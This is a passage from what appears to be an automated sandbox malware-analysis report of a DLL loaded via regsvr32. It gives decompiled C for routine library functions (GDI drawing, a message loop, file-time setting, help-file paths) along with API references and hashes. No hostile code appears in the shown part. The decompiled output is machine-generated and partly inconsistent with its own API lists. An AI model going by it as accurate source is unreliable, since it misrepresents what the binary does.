							_t127 =  *((intOrPtr*)(_t175 + 0xc));
							if(_t127 != 0) {
								_t128 =  *((intOrPtr*)(_t127 + 4));
							} else {
								_t128 = 0;
							}
							if(E1000D0A1( *(_t175 - 0x38), _t128) != 0) {
								E1000BD03(E10020117(_t175 - 0x3c, 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *((intOrPtr*)(_t175 + 0x10))), _t175 - 0x3c, 0xffffff);
								 *((intOrPtr*)(_t175 + 0xc)) = E1000D13A(_t175 - 0x3c, _t175 - 0x2c);
								BitBlt( *(_t175 - 0x38), 1, 1,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
								E1000D13A(_t175 - 0x3c, _t175 - 0x24);
								BitBlt( *(_t175 - 0x38), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
								E1000BD03(E1000D13A(_t175 - 0x3c,  *((intOrPtr*)(_t175 + 0xc))), _t175 - 0x3c,  *((intOrPtr*)(_t175 - 0x10)));
							}
							E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)( *((intOrPtr*)(_t175 - 0x14)) + 4)));
							E1000D0A1( *(_t175 - 0x38),  *( *((intOrPtr*)(_t175 + 8)) + 4));
						}
					}
				}
				 *(_t175 - 4) = 3;
				 *((intOrPtr*)(_t175 - 0x24)) = 0x10098308;
				L1000CFF6(_t175 - 0x24);
				 *(_t175 - 4) = 2;
				 *((intOrPtr*)(_t175 - 0x2c)) = 0x10098308;
				L1000CFF6(_t175 - 0x2c);
				 *(_t175 - 4) = 1;
				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098308;
				L1000CFF6(_t175 - 0x1c);
				 *(_t175 - 4) = 0;
				L1000CD56(_t175 - 0x4c);
				 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t175 - 0x3c));
			}

0x1000d64c
0x1000d64c
0x1000d64c
0x1000d653
0x1000d65f
0x1000d662
0x1000d665
0x1000d668
0x1000d66b
0x1000d66e
0x1000d671
0x1000d674
0x1000d677
0x1000d67a
0x1000d67d
0x1000d68c
0x1000d692
0x1000d696
0x1000d69d
0x1000d6a3
0x1000d6a7
0x1000d6b3
0x1000d6c4
0x1000d6de
0x1000d6ea
0x1000d6f3
0x1000d713
0x1000d749
0x1000d74f
0x1000d757
0x1000d75a
0x1000d78c
0x1000d7a5
0x1000d7bf
0x1000d7c1
0x1000d7c6
0x1000d7cc
0x1000d7c8
0x1000d7c8
0x1000d7c8
0x1000d7da
0x1000d7f3
0x1000d80f
0x1000d81f
0x1000d828
0x1000d83e
0x1000d851
0x1000d851
0x1000d85f
0x1000d86d
0x1000d86d
0x1000d75a
0x1000d713
0x1000d87a
0x1000d87e
0x1000d881
0x1000d889
0x1000d88d
0x1000d890
0x1000d898
0x1000d89c
0x1000d89f
0x1000d8a7
0x1000d8aa
0x1000d8af
0x1000d8c0

APIs

__EH_prolog3.LIBCMT ref: 1000D653
GetSysColor.USER32 ref: 1000D690

Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566

GetSysColor.USER32 ref: 1000D6A1
CreateCompatibleDC.GDI32(00000000), ref: 1000D6B7
CreateCompatibleDC.GDI32(00000000), ref: 1000D6CB
GetObjectA.GDI32(00000004,00000018,?), ref: 1000D6EA
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D724

Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9

GetPixel.GDI32(?,00000000,00000000), ref: 1000D76D

Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D79A
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000D7BF
BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 1000D81F
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 1000D83E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ColorCreate$CompatibleH_prolog3Object$BitmapBrushPixelSelectSolid
String ID:
API String ID: 308505048-0
Opcode ID: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
Instruction ID: a11892d7ca785269b60d086ed1427836696bf80ae4361ed389aeb394a5747b4d
Opcode Fuzzy Hash: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
Instruction Fuzzy Hash: 2C81C575C0020DAEEF01EFE4DC81AEEBBB9EF08384F10802AF515A6165DB719E55DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100272E2 Relevance: 18.2, APIs: 12, Instructions: 150
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100272E2(intOrPtr* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				struct tagMSG _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t46;
				int _t49;
				long _t50;
				int _t56;
				int _t58;
				int _t64;
				int _t73;
				int _t83;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t92;
				void* _t93;

				_t92 = __ecx;
				_t88 = 1;
				if( *((intOrPtr*)(__ecx + 0x68)) == 1) {
					L26:
					return _t46;
				}
				_t46 = L10026F7E();
				if(_t46 == 0) {
					goto L26;
				}
				_t46 = PeekMessageA( &_v56,  *(__ecx + 0x20), 0x367, 0x367, 3);
				if(_t46 != 0) {
					goto L26;
				}
				_t49 =  *(_t92 + 0x68);
				_v16 = _t49;
				 *(_t92 + 0x68) = 1;
				if(_t49 == 2) {
					L7:
					__eflags = _v16;
					_push(0);
					if(_v16 != 0) {
						_t50 = SendMessageA( *(_t92 + 0x20), 0x362, 0xe002, ??);
						__eflags = _t50;
						_v16 = _t50;
						if(_t50 == 0) {
							_v16 = 0xe001;
						}
						_v12 = 0;
						GetCursorPos( &_v28);
						L10026FD8(_t92, _v28.x, _v28.y, 0);
						_v8 = 0;
						_t89 =  *((intOrPtr*)(E1001E302(0, _t88, _t92, __eflags) + 4));
						_v20 = _t89;
						while(1) {
							__eflags =  *(_t92 + 0x68);
							if( *(_t92 + 0x68) == 0) {
								break;
							}
							_t56 = PeekMessageA( &_v56, 0, 0, 0, 0);
							__eflags = _t56;
							if(_t56 == 0) {
								_t82 = _t89;
								_t58 =  *((intOrPtr*)( *_t89 + 0x60))(_v8);
								_v8 = _v8 + 1;
								__eflags = _t58;
								if(_t58 == 0) {
									_v8 = 0;
									WaitMessage();
								}
								continue;
							}
							_t82 = _t92;
							_t73 = E100270E7(_t92,  &_v56,  &_v12);
							__eflags = _t73;
							if(_t73 == 0) {
								break;
							}
						}
						 *(_t92 + 0x68) = 0;
						ReleaseCapture();
						E10013FEA(0, _t82, _t93, SetCapture( *(_t92 + 0x20)));
						ReleaseCapture();
						SendMessageA( *(_t92 + 0x20), 0x362, _v16, 0);
						_t83 =  *(_t92 + 0x80);
						__eflags = _t83;
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 0x60))(0);
						}
						__eflags = _v12;
						if(_v12 != 0) {
							__eflags = _v12 - 0xffffffff;
							if(_v12 != 0xffffffff) {
								 *((intOrPtr*)( *_v20 + 0xac))(_v12, 1);
							} else {
								SendMessageA( *(_t92 + 0x20), 0x111, 0xe147, 0);
							}
						}
						_t64 = PostMessageA( *(_t92 + 0x20), 0x36a, 0, 0);
						L25:
						return _t64;
					}
					_t64 = PostMessageA( *(_t92 + 0x20), 0x111, 0xe145, ??);
					 *(_t92 + 0x68) = 2;
					goto L25;
				}
				_t88 = _t92 + 0x80;
				_t85 =  *_t88;
				if(_t85 == 0) {
					goto L7;
				}
				_push(1);
				if( *((intOrPtr*)( *_t85 + 0x60))() != 0) {
					goto L7;
				} else {
					_t64 =  *((intOrPtr*)( *((intOrPtr*)( *_t88)) + 0x60))(0);
					 *(_t92 + 0x68) = 0;
					goto L25;
				}
			}

0x100272ec
0x100272ee
0x100272f2
0x10027493
0x10027493
0x10027493
0x100272f8
0x100272ff
0x00000000
0x00000000
0x10027315
0x1002731d
0x00000000
0x00000000
0x10027323
0x1002732c
0x1002732f
0x10027332
0x1002735b
0x1002735b
0x1002735e
0x1002735f
0x1002738d
0x10027393
0x10027395
0x10027398
0x1002739a
0x1002739a
0x100273a5
0x100273a8
0x100273b7
0x100273bc
0x100273c4
0x100273c7
0x1002740d
0x1002740d
0x10027410
0x00000000
0x00000000
0x100273d4
0x100273da
0x100273dc
0x100273f8
0x100273fa
0x100273fd
0x10027400
0x10027402
0x10027404
0x10027407
0x10027407
0x00000000
0x10027402
0x100273e6
0x100273e8
0x100273ed
0x100273ef
0x00000000
0x00000000
0x100273f1
0x10027418
0x1002741b
0x10027427
0x1002742c
0x10027440
0x10027442
0x10027448
0x1002744a
0x1002744f
0x1002744f
0x10027452
0x10027455
0x10027457
0x1002745b
0x10027479
0x1002745d
0x1002746b
0x1002746b
0x1002745b
0x10027489
0x1002748f
0x00000000
0x1002748f
0x1002736e
0x10027374
0x00000000
0x10027374
0x10027334
0x1002733a
0x1002733e
0x00000000
0x00000000
0x10027342
0x10027349
0x00000000
0x1002734b
0x10027350
0x10027353
0x00000000
0x10027353

APIs

Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026F9A
Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026FB3

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 10027315
PostMessageA.USER32(?,00000111,0000E145,00000000), ref: 1002736E
SendMessageA.USER32 ref: 1002738D
GetCursorPos.USER32(?), ref: 100273A8
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100273D4
ReleaseCapture.USER32 ref: 1002741B
SetCapture.USER32(?), ref: 10027420
ReleaseCapture.USER32 ref: 1002742C
SendMessageA.USER32 ref: 10027440
SendMessageA.USER32 ref: 1002746B
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10027489

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$CaptureCursorSend$LoadPeekPostRelease
String ID:
API String ID: 291007519-0
Opcode ID: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
Instruction ID: c30bbffdb3fe4ae6972bf7ce15c5940e6a562e61142bcdf2c6550b1aac08a7c5
Opcode Fuzzy Hash: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
Instruction Fuzzy Hash: AC51AFB1A00609EFEB11EFA1DC84DAEBBB9FF44344F514569F686A62A0D730AD40DF50

Uniqueness

Uniqueness Score: -1.00%

Function 10039102 Relevance: 18.1, APIs: 12, Instructions: 121
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10039102(CHAR* _a4, signed int* _a8) {
				signed int _v8;
				FILETIME* _v12;
				FILETIME* _v16;
				char _v24;
				char _v32;
				struct _FILETIME _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t40;
				long _t41;
				long _t43;
				signed int* _t47;
				void* _t70;
				void* _t83;
				signed int* _t84;
				void* _t85;

				_t70 = 0;
				_v16 = 0;
				_v12 = 0;
				_t40 = GetFileAttributesA(_a4);
				_t82 = GetLastError;
				_v8 = _t40;
				if(_t40 == 0xffffffff) {
					L10034B40(0, GetLastError, _t83, _t85, GetLastError(), _a4);
				}
				_t84 = _a8;
				_t41 = _t84[8] & 0x000000ff;
				if(_t41 != _v8 && (_v8 & 0x00000001) != 0 && SetFileAttributesA(_a4, _t41) == 0) {
					L10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
				}
				_t42 =  &(_t84[2]);
				if((_t84[2] | _t84[3]) != 0) {
					E10039067(_t70,  &_v40, _t82, _t84, _t42,  &_v40);
					_t47 =  &(_t84[4]);
					_t77 =  *_t47 | _t47[1];
					if(( *_t47 | _t47[1]) != 0) {
						E10039067(_t70,  &_v24, _t82, _t84, _t47,  &_v24);
						_pop(_t77);
						_v12 =  &_v24;
					}
					if(( *_t84 | _t84[1]) != 0) {
						E10039067(_t70, _t77, _t82, _t84, _t84,  &_v32);
						_v16 =  &_v32;
					}
					_t70 = CreateFileA(_a4, 0xc0000000, 1, _t70, 3, 0x80, _t70);
					if(_t70 == 0xffffffff) {
						L10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
					if(SetFileTime(_t70, _v16, _v12,  &_v40) == 0) {
						L10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
					if(CloseHandle(_t70) == 0) {
						L10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
				}
				_t43 = _t84[8] & 0x000000ff;
				if(_t43 == _v8 || (_v8 & 0x00000001) != 0) {
					L21:
					return _t43;
				} else {
					_t43 = SetFileAttributesA(_a4, _t43);
					if(_t43 != 0) {
						goto L21;
					}
					return L10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
				}
			}

0x1003910e
0x10039110
0x10039113
0x10039116
0x1003911f
0x10039125
0x10039128
0x10039130
0x10039130
0x10039135
0x10039138
0x1003913f
0x1003915b
0x1003915b
0x10039160
0x10039168
0x10039173
0x10039179
0x1003917f
0x10039182
0x10039189
0x10039192
0x10039193
0x10039193
0x1003919b
0x100391a2
0x100391ac
0x100391ac
0x100391c8
0x100391cd
0x100391d5
0x100391d5
0x100391ed
0x100391f5
0x100391f5
0x10039203
0x1003920b
0x1003920b
0x10039203
0x10039210
0x10039217
0x1003923c
0x1003923c
0x1003921f
0x10039223
0x1003922b
0x00000000
0x00000000
0x00000000
0x10039233

APIs

GetFileAttributesA.KERNEL32(?), ref: 10039116
GetLastError.KERNEL32(?), ref: 1003912D
SetFileAttributesA.KERNEL32(?,?), ref: 1003914B
GetLastError.KERNEL32(?), ref: 10039158
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 100391C2
GetLastError.KERNEL32(?), ref: 100391D2
SetFileTime.KERNEL32(00000000,?,?,?), ref: 100391E5
GetLastError.KERNEL32(?), ref: 100391F2
CloseHandle.KERNEL32(00000000), ref: 100391FB
GetLastError.KERNEL32(?), ref: 10039208
SetFileAttributesA.KERNEL32(?,?), ref: 10039223
GetLastError.KERNEL32(?), ref: 10039230

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast$File$Attributes$CloseCreateHandleTime
String ID:
API String ID: 3867745407-0
Opcode ID: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
Instruction ID: 7f419f033f1c2a31a84a6146d95747ac909fd2f0a9a0dff047200850bf0561e9
Opcode Fuzzy Hash: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
Instruction Fuzzy Hash: 97415B75900249BFDB12DFA1CD89EDEBBFCEF04392F118455F855AA0A1DB34EA40DA20

Uniqueness

Uniqueness Score: -1.00%

Function 10034554 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10034554(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
				char _v124;
				char* _v128;
				char _v660;
				char _v804;
				char _v812;
				char _v820;
				intOrPtr _v832;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char* _t53;
				char* _t57;
				void* _t59;
				intOrPtr _t73;
				void* _t76;
				char* _t79;
				char* _t81;
				char* _t84;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t102;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;

				_t94 = __edx;
				_t90 = __ecx;
				_t102 =  &_v660;
				_t109 = _t108 - 0x310;
				_t44 =  *0x100b9e70; // 0x6fb3f782
				_a652 = _t44 ^ _t102;
				_push(_t87);
				_push(_t95);
				_t99 = __ecx;
				_t96 = E1001E302(_t87, _t95, __ecx, __eflags);
				 *(_t96 + 8) =  *(_t99 + 0x44);
				 *(_t96 + 0xc) =  *(_t99 + 0x44);
				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
					L7:
					E1000C2FB(_t90);
				} else {
					__eflags = __eax - 0x104;
					if(__eax == 0x104) {
						goto L7;
					}
				}
				_t53 = PathFindExtensionA( &_a392);
				__eflags = _t53;
				_v128 = _t53;
				if(_t53 == 0) {
					E1000C2FB(_t90);
				}
				 *_v128 = 0;
				_t57 = E10034516( &_a392,  &_a132, 0x104);
				__eflags = _t57;
				if(_t57 != 0) {
					E1000C2FB(_t90);
				}
				__eflags =  *(_t99 + 0x60);
				if( *(_t99 + 0x60) != 0) {
					L15:
					_t58 =  *(_t99 + 0x50);
					__eflags = _t58;
					if(_t58 != 0) {
						L20:
						 *(_t96 + 0x10) = _t58;
						__eflags =  *(_t99 + 0x64);
						if( *(_t99 + 0x64) != 0) {
							L26:
							__eflags =  *(_t99 + 0x68);
							if( *(_t99 + 0x68) != 0) {
								L28:
								_pop(_t97);
								_pop(_t100);
								_pop(_t89);
								_t59 = E1004763E(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
								__eflags =  &_a656;
								return _t59;
							} else {
								_push(E1004D00F(_t94,  &_a132, 0x104, ".INI"));
								L1000135C(0x104, _t90, _t96, _t99);
								_t58 = L1004C810( &_a132);
								_t109 = _t109 + 0x14;
								__eflags = _t58;
								 *(_t99 + 0x68) = _t58;
								if(_t58 == 0) {
									goto L14;
								} else {
									goto L28;
								}
							}
						} else {
							_t76 =  &_a652 - _v128;
							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
								_push(".HLP");
							} else {
								_push(".CHM");
							}
							_push(_t76);
							_push(_v128);
							E10019530(0x104, _t94, _t96, _t99, _t102);
							_t109 = _t109 + 0xc;
							_t79 = L1004C810( &_a392);
							__eflags = _t79;
							_pop(_t90);
							 *(_t99 + 0x64) = _t79;
							if(_t79 == 0) {
								goto L14;
							} else {
								_t58 = _v128;
								 *_v128 = 0;
								goto L26;
							}
						}
					} else {
						_t81 = E1001FA58(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
						__eflags = _t81;
						if(_t81 == 0) {
							_push( *(_t99 + 0x60));
						} else {
							_push( &_v124);
						}
						_t58 = L1004C810();
						__eflags = _t58;
						 *(_t99 + 0x50) = _t58;
						_pop(_t90);
						if(_t58 == 0) {
							goto L14;
						} else {
							goto L20;
						}
					}
				} else {
					_t84 = L1004C810( &_a132);
					__eflags = _t84;
					_pop(_t90);
					 *(_t99 + 0x60) = _t84;
					if(_t84 != 0) {
						goto L15;
					} else {
						L14:
						_push(_t102);
						_t105 = _t109;
						_push(_t90);
						_v804 = 0x100b84e8;
						L10048E48( &_v804, 0x100afe38);
						asm("int3");
						_push(_t105);
						_t106 = _t109;
						_push(_t90);
						_v812 = 0x100b8580;
						L10048E48( &_v812, 0x100afeec);
						asm("int3");
						_push(_t106);
						_push(_t90);
						_v820 = 0x100b8618;
						L10048E48( &_v820, 0x100aff30);
						asm("int3");
						_push(4);
						E1004764D(0x1008dd26, 0x104, _t96, _t99);
						_t93 = E10020454(0x104);
						_v832 = _t93;
						_t73 = 0;
						_v820 = 0;
						if(_t93 != 0) {
							_t73 = E1001DB72(_t93);
						}
						return E10047725(_t73);
					}
				}
			}

0x10034554
0x10034554
0x10034555
0x1003455c
0x10034562
0x10034569
0x1003456f
0x10034571
0x10034572
0x10034579
0x1003457e
0x10034584
0x1003459f
0x100345a5
0x100345a5
0x100345a1
0x100345a1
0x100345a3
0x00000000
0x00000000
0x100345a3
0x100345b1
0x100345b7
0x100345b9
0x100345bc
0x100345be
0x100345be
0x100345c6
0x100345d8
0x100345dd
0x100345df
0x100345e1
0x100345e1
0x100345e6
0x100345ea
0x10034605
0x10034605
0x10034608
0x1003460a
0x10034639
0x10034639
0x1003463c
0x10034640
0x10034683
0x10034683
0x10034687
0x100346bb
0x100346c1
0x100346c2
0x100346c5
0x100346c6
0x100346cb
0x100346d2
0x10034689
0x1003469b
0x1003469c
0x100346a8
0x100346ad
0x100346b0
0x100346b2
0x100346b5
0x00000000
0x00000000
0x00000000
0x00000000
0x100346b5
0x10034642
0x10034648
0x1003464b
0x1003464f
0x10034658
0x10034651
0x10034651
0x10034651
0x1003465d
0x1003465e
0x10034661
0x1003466c
0x10034670
0x10034675
0x10034677
0x10034678
0x1003467b
0x00000000
0x1003467d
0x1003467d
0x10034680
0x00000000
0x10034680
0x1003467b
0x1003460c
0x1003461a
0x1003461f
0x10034621
0x10034629
0x10034623
0x10034626
0x10034626
0x1003462c
0x10034631
0x10034633
0x10034636
0x10034637
0x00000000
0x00000000
0x00000000
0x00000000
0x10034637
0x100345ec
0x100345f3
0x100345f8
0x100345fa
0x100345fb
0x100345fe
0x00000000
0x10034600
0x10034600
0x1000a035
0x1000a036
0x1000a038
0x1000a042
0x1000a049
0x1000a04e
0x1000a04f
0x1000a050
0x1000a052
0x1000a05c
0x1000a063
0x1000a068
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1
0x100345fe

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034597
PathFindExtensionA.SHLWAPI(?), ref: 100345B1
__strdup.LIBCMT ref: 100345F3
__strdup.LIBCMT ref: 1003462C
__strdup.LIBCMT ref: 10034670
_strcat_s.LIBCMT ref: 10034696
__strdup.LIBCMT ref: 100346A8

Strings

.HLP, xrefs: 10034658
.CHM, xrefs: 10034651
.INI, xrefs: 10034689

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
String ID: .CHM$.HLP$.INI
API String ID: 1153805871-4017452060
Opcode ID: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
Instruction ID: a6efce3dbb9c2253d83b29fb9a4a92cf41fa315539aa0d7df2616f374f526431
Opcode Fuzzy Hash: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
Instruction Fuzzy Hash: BC416BB95006499FEB61DFB5CC85BCA77E8FF05285F12482AE945DA141EF30FA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 1001D678 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001D678(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
				void* _v8;
				void* _v20;
				void* _t16;

				_t16 = __ecx;
				_a100 = _a100 + __edx;
			}

0x1001d678
0x1001d67d

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 1001D685
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 1001D6A6
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 1001D6B8
GetProcAddress.KERNEL32(ActivateActCtx), ref: 1001D6CA
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 1001D6DC

Strings

ReleaseActCtx, xrefs: 1001D6A8
KERNEL32, xrefs: 1001D680
CreateActCtxW, xrefs: 1001D6A0
ActivateActCtx, xrefs: 1001D6BA
DeactivateActCtx, xrefs: 1001D6CC

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
